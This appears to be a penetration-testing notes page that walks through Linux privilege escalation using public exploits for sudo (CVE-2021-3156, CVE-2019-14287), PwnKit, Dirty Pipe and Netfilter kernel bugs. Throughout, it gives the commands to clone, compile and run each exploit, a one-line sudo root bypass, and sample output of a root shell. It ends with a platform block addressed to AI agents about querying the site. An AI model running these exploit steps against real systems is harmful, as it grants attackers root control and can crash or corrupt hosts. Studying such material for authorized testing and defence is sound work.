# Recent 0-Days ## Sudo The program `sudo` is used under UNIX operating systems like Linux or macOS to start processes with the rights of another user. In most cases, commands are executed that are only available to administrators. It serves as an additional layer of security or a safeguard to prevent the system and its contents from being damaged by unauthorized users. The `/etc/sudoers` file specifies which users or groups are allowed to run specific programs and with what privileges. ```bash sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d' ``` One of the latest vulnerabilities for `sudo` carries the CVE-2021-3156 and is based on a heap-based buffer overflow vulnerability. This affected the sudo versions: * 1.8.31 - Ubuntu 20.04 * 1.8.27 - Debian 10 * 1.9.2 - Fedora 33 * and others To find out the version of `sudo`, the following command is sufficient: ```bash sudo -V | head -n1 ``` The interesting thing about this vulnerability was that it had been present for over ten years until it was discovered. There is also a public [Proof-Of-Concept](https://github.com/blasty/CVE-2021-3156) that can be used for this. We can either download this to a copy of the target system we have created or, if we have an internet connection, to the target system itself. ```bash git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156 make ``` When running the exploit, we can be shown a list that will list all available versions of the operating systems that may be affected by this vulnerability. ```bash ./sudo-hax-me-a-sandwich ``` We can find out which version of the operating system we are dealing with using the following command: ```bash cat /etc/lsb-release ``` Next, we specify the respective ID for the version operating system and run the exploit with our payload. ```bash ./sudo-hax-me-a-sandwich 1 ``` ### Sudo Policy Bypass Another vulnerability was found in 2019 that affected all versions below `1.8.28`, which allowed privileges to escalate even with a simple command. This vulnerability has the [CVE-2019-14287](https://www.sudo.ws/security/advisories/minus_1_uid/) and requires only a single prerequisite. It had to allow a user in the `/etc/sudoers` file to execute a specific command. ```bash sudo -l ``` ```shell-session User cry0l1t3 may run the following commands on Penny: ALL=(ALL) /usr/bin/id ``` In fact, `Sudo` also allows commands with specific user IDs to be executed, which executes the command with the user's privileges carrying the specified ID. The ID of the specific user can be read from the `/etc/passwd` file. ```shell-session cat /etc/passwd | grep cry0l1t3 cry0l1t3:x:1005:1005:cry0l1t3,,,:/home/cry0l1t3:/bin/bash ``` Thus the ID for the user `cry0l1t3` would be `1005`. If a negative ID (`-1`) is entered at `sudo`, this results in processing the ID `0`, which only the `root` has. This, therefore, led to the immediate root shell ```bash sudo -u#-1 id ``` ## Polkit PolicyKit (`polkit`) is an authorization service on Linux-based operating systems that allows user software and system components to communicate with each other if the user software is authorized to do so. To check whether the user software is authorized for this instruction, `polkit` is asked. Polkit works with two groups of files. 1. actions/policies (`/usr/share/polkit-1/actions`) 2. rules (`/usr/share/polkit-1/rules.d`) Polkit also has `local authority` rules which can be used to set or remove additional permissions for users and groups. Custom rules can be placed in the directory `/etc/polkit-1/localauthority/50-local.d` with the file extension `.pkla`. PolKit also comes with three additional programs: * `pkexec` - runs a program with the rights of another user or with root rights * `pkaction` - can be used to display actions * `pkcheck` - this can be used to check if a process is authorized for a specific action The most interesting tool for us, in this case, is `pkexec` because it performs the same task as `sudo` and can run a program with the rights of another user or root. ```bash pkexec -u root id ``` In the `pkexec` tool, the memory corruption vulnerability with the identifier [CVE-2021-4034](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034) was found, also known as [Pwnkit](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034) and also leads to privilege escalation. This vulnerability was also hidden for more than ten years, and no one can precisely say when it was discovered and exploited. Finally, in November 2021, this vulnerability was published and fixed two months later. To exploit this vulnerability, we need to download a [PoC](https://github.com/arthepsy/CVE-2021-4034) and compile it on the target system itself or a copy we have made. ```bash git clone https://github.com/arthepsy/CVE-2021-4034.git cd CVE-2021-4034 gcc cve-2021-4034-poc.c -o poc ``` Once we have compiled the code, we can execute it without further ado. After the execution, we change from the standard shell (`sh`) to Bash (`bash`) and check the user's IDs. ```bash ./poc ``` ### Compiling for old glibc versions This is a "janky" way to compile for old version, which is just statically linking the libraries... ```bash gcc cve-2021-4034-poc.c -o poc -static -static-libgcc ``` (adds the `-static -static-libgcc`) ## Dirty Pipe A vulnerability in the Linux kernel, named [Dirty Pipe](https://dirtypipe.cm4all.com/) ([CVE-2022-0847](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847)), allows unauthorized writing to root user files on Linux. Technically, the vulnerability is similar to the [Dirty Cow](https://dirtycow.ninja/) vulnerability discovered in 2016. All kernels from version `5.8` to `5.17` are affected and vulnerable to this vulnerability. In simple terms, this vulnerability allows a user to write to arbitrary files as long as he has read access to these files. It is also interesting to note that Android phones are also affected. Android apps run with user rights, so a malicious or compromised app could take over the phone. This vulnerability is based on pipes. Pipes are a mechanism of unidirectional communication between processes that are particularly popular on Unix systems. For example, we could edit the `/etc/passwd` file and remove the password prompt for the root. This would allow us to log in with the `su` command without the password prompt. To exploit this vulnerability, we need to download a [PoC](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) and compile it on the target system itself or a copy we have made. **Download Dirty Pipe Exploit** ```bash git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git cd CVE-2022-0847-DirtyPipe-Exploits bash compile.sh ``` After compiling the code, we have two different exploits available. The first exploit version (`exploit-1`) modifies the `/etc/passwd` and gives us a prompt with root privileges. For this, we need to verify the kernel version and then execute the exploit. **Verify Kernel Version** ```shell-session uname -r 5.13.0-46-generic ``` **Exploitation** ```shell-session ./exploit-1 Backing up /etc/passwd to /tmp/passwd.bak ... Setting root password to "piped"... Password: Restoring /etc/passwd from /tmp/passwd.bak... Done! Popping shell... (run commands now) id uid=0(root) gid=0(root) groups=0(root) ``` With the help of the 2nd exploit version (`exploit-2`), we can execute SUID binaries with root privileges. However, before we can do that, we first need to find these SUID binaries. For this, we can use the following command: **Find SUID Binaries** ```bash find / -perm -4000 2>/dev/null ``` Then we can choose a binary and specify the full path of the binary as an argument for the exploit and execute it. ```bash ./exploit-2 /usr/bin/sudo ``` ## Netfilter `Netfilter` is a Linux kernel module that provides, among other things, packet filtering, network address translation, and other tools relevant to firewalls. It controls and regulates network traffic by manipulating individual packets based on their characteristics and rules. `Netfilter` is also called the software layer in the Linux kernel. When network packets are received and sent, it initiates the execution of other modules such as packet filters. These modules can then intercept and manipulate packets. This includes the programs like `iptables` and `arptables`, which serve as action mechanisms of the `Netfilter` hook system of the IPv4 and IPv6 protocol stack. This kernel module has three main functions: 1. Packet defragmentation 2. Connection tracking 3. Network address translation (NAT) When the module is activated, all IP packets are checked by the `Netfilter` before they are forwarded to the target application of the own or remote system. In 2021 ([CVE-2021-22555](https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555)), 2022 ([CVE-2022-1015](https://github.com/pqlx/CVE-2022-1015)), and also in 2023 ([CVE-2023-32233](https://github.com/Liuk3r/CVE-2023-32233)), several vulnerabilities were found that could lead to privilege escalation. Even if the company uses virtual machines or containers like Docker, these are built on a specific kernel. The idea of isolating the software application from the existing host system is a good step, but there are many ways to break out of such a container. **CVE-2021-22555** Vulnerable kernel versions: 2.6 - 5.11 ```shell-session uname -r 5.10.5-051005-generic ``` ```shell-session wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c gcc -m32 -static exploit.c -o exploit ./exploit ``` **CVE-2022-25636** A recent vulnerability is [CVE-2022-25636](https://www.cvedetails.com/cve/CVE-2022-25636/) and affects Linux kernel 5.4 through 5.6.10. This is `net/netfilter/nf_dup_netdev.c`, which can grant root privileges to local users due to heap out-of-bounds write. `Nick Gregory` wrote a very detailed [article](https://nickgregory.me/post/2022/03/12/cve-2022-25636/) about how he discovered this vulnerability. ```shell-session uname -r 5.13.0-051300-generic ``` However, we need to be careful with this exploit as **it can corrupt the kernel**, and a reboot will be required to reaccess the server. ```bash sudo apt-get install libfuse-dev sudo apt-get install libmnl-dev sudo apt-get install libnftnl-dev ``` ```bash git clone https://github.com/Bonfee/CVE-2022-25636.git cd CVE-2022-25636 make ./exploit ``` **CVE-2023-32233** This vulnerability exploits the so called `anonymous sets` in `nf_tables` by using the `Use-After-Free` vulnerability in the Linux Kernel up to version `6.3.1`. These `nf_tables` are temporary workspaces for processing batch requests and once the processing is done, these anonymous sets are supposed to be cleared out (`Use-After-Free`) so they cannot be used anymore. Due to a mistake in the code, these anonymous sets are not being handled properly and can still be accessed and modified by the program. The exploitation is done by manipulating the system to use the `cleared out` anonymous sets to interact with the kernel's memory. By doing so, we can potentially gain `root` privileges. ```bash git clone https://github.com/Liuk3r/CVE-2023-32233 cd CVE-2023-32233 gcc -Wall -o exploit exploit.c -lmnl -lnftnl ``` {% hint style="danger" %} Please keep in mind that these exploits can be very unstable and can break the system. {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.rtlcopymemory.com/privilege-escalation/linux-privilege-escalation/recent-0-days.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.